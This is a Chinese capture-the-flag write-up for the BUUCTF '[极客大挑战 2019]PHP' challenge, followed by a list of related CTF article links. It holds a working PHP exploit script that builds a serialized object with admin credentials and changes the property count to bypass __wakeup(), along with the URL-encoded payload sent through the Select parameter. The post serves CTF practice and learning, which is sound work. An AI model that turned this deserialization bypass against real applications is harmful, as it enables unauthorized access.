[极客大挑战 2019]PHP

简介: [极客大挑战 2019]PHP

打开

发现有一个提示,良好网站备份,一般情况下是拿dirsearch扫的。但是我的dirsearch扫buu都是429,头大呢。

看别的师傅的wp,扫除一个www.zip,源码如下。

以及

分析一下:

第一张图片说我们应该get上去一个select。

第二张图片和我说让我改username=admin,password=100。然后绕过__wakeup()

Exp:

<?php
 
class Name{
 
    private $username = '11111';
 
    private $password = '22222';
 
    public function __construct($username,$password){
 
        $this->username = $username;
 
        $this->password = $password;
 
    }
 
}
 
$j17 = new Name('admin','100');
 
$a=serialize($j17);
 
$a=str_replace(':2:',':3:',$a);//绕过wakeup
 
echo urlencode($a);
 
?>

payload:


/?Select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

目录
相关文章
|
PHP 数据安全/隐私保护
[SUCTF 2019]EasyWeb
[SUCTF 2019]EasyWeb
200 0
|
5月前
|
安全 Shell PHP
escapeshellarg() 和 escapeshellcmd()
escapeshellarg() 和 escapeshellcmd()
|
6月前
|
Linux
BUU [安洵杯 2019]easy_web
BUU [安洵杯 2019]easy_web
127 0
|
6月前
|
PHP 开发工具 git
BUU [BJDCTF2020]Mark loves cat
BUU [BJDCTF2020]Mark loves cat
63 0
|
6月前
BUU [BJDCTF2020]ZJCTF,不过如此
BUU [BJDCTF2020]ZJCTF,不过如此
47 0
|
6月前
|
Docker 容器
NSS [第五空间 2021]pklovecloud
NSS [第五空间 2021]pklovecloud
73 0
|
数据安全/隐私保护
[MRCTF2020]古典密码知多少 1
[MRCTF2020]古典密码知多少 1
320 0
|
6月前
NSS [SWPUCTF 2021 新生赛]pop
NSS [SWPUCTF 2021 新生赛]pop
96 0
|
4月前
|
安全 Java Linux
文件上传漏洞(三)Cknife
文件上传漏洞(三)Cknife
|
6月前
|
PHP Apache
[SUCTF 2019]CheckIn
[SUCTF 2019]CheckIn
49 0

热门文章

最新文章